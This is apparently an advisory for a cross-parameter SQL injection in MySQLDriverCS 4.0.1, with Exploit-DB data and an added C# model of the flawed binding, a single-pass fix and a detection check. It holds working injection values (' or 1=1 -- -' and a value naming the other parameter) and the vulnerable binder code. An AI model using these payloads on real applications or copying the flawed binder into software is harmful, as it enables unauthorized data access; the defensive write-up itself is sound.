Vendor: MySQLDriverCS
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: MySQLDriverCS
Affected Version From: MySQLDriverCS 4.0.1
Affected Version To: Potentially other versions
Patch Exists: NO

MySQLDriverCS SQL Injection Vulnerability

The MySQLDriverCS application is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user-supplied input before using it in SQL queries. Prepared statements or parameterized queries can be used to prevent SQL injection attacks.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48466/info

MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.

The following example illustrates the attack against the vulnerability:
----------------------------------------------------------------------
DataTable dt = new DataTable();
MySQLConnection conn = new MySQLConnection(CONN_STRING);
MySQLDataAdapter Cmd = new MySQLDataAdapter();
string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
Cmd.SelectCommand.Connection.Open();
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
Cmd.Fill(dt);
Cmd.SelectCommand.Connection.Close();
----------------------------------------------------------------------

Parameter assignment (one parameter is assigned the SQL injection attack vector, while the other is assigned a string that contains the name of the first parameter):
----------------------------------------------------------------------
@sFileName: " or 1=1 -- -"
@sLanguage: "cn@sFileName"
----------------------------------------------------------------------

The final SQL statement executed by MySQL is then as follows:
----------------------------------------------------------------------
SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
----------------------------------------------------------------------
Note that two parameters are required to launch this cross-parameter SQL injection attack.
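
The cross-parameter behaviour described above can be reproduced with a small model, given here as an added example (not code from MySQLDriverCS or from the advisory), next to a single-pass binder and an application-side check. It assumes the driver expands placeholders by repeated text replacement, in an order chosen to match the final statement shown above; all class and method names are hypothetical.

```csharp
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;
// Hypothetical model; none of these names come from MySQLDriverCS.
static class CrossParameterDemo
{
    // Quote and escape a value. Escaping does not help here: the advisory's
    // values contain no quote character at all.
    static string Quote(string v) =>
        "'" + v.Replace("\\", "\\\\").Replace("'", "\\'") + "'";

    // Assumed flawed behaviour: every placeholder is expanded by a text replace
    // over the whole statement, so a value inserted earlier is scanned again.
    public static string BindSequential(string sql,
        IDictionary<string, string> ps, params string[] order)
    {
        foreach (var name in order) sql = sql.Replace(name, Quote(ps[name]));
        return sql;
    }

    // Single pass over the original statement: substituted values are never
    // rescanned. (Simplified: does not skip literals or comments in the SQL text.)
    public static string BindSinglePass(string sql, IDictionary<string, string> ps) =>
        Regex.Replace(sql, @"@\w+",
            m => ps.TryGetValue(m.Value, out var v) ? Quote(v) : m.Value);

    // Application-side check while the affected driver is still in use:
    // true if any value contains the name of a parameter of the same command.
    public static bool ValueContainsParameterName(IDictionary<string, string> ps)
    {
        foreach (var v in ps.Values)
            foreach (var name in ps.Keys)
                if (v.IndexOf(name, StringComparison.OrdinalIgnoreCase) >= 0) return true;
        return false;
    }

    static void Main()
    {
        const string sql = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
        var ps = new Dictionary<string, string> {   // values from the advisory
            ["@sFileName"] = " or 1=1 -- -",
            ["@sLanguage"] = "cn@sFileName",
        };
        // Replacement order is an assumption chosen to match the advisory's output.
        Console.WriteLine(BindSequential(sql, ps, "@sLanguage", "@sFileName"));
        Console.WriteLine(BindSinglePass(sql, ps));
        Console.WriteLine(ValueContainsParameterName(ps));
    }
}
```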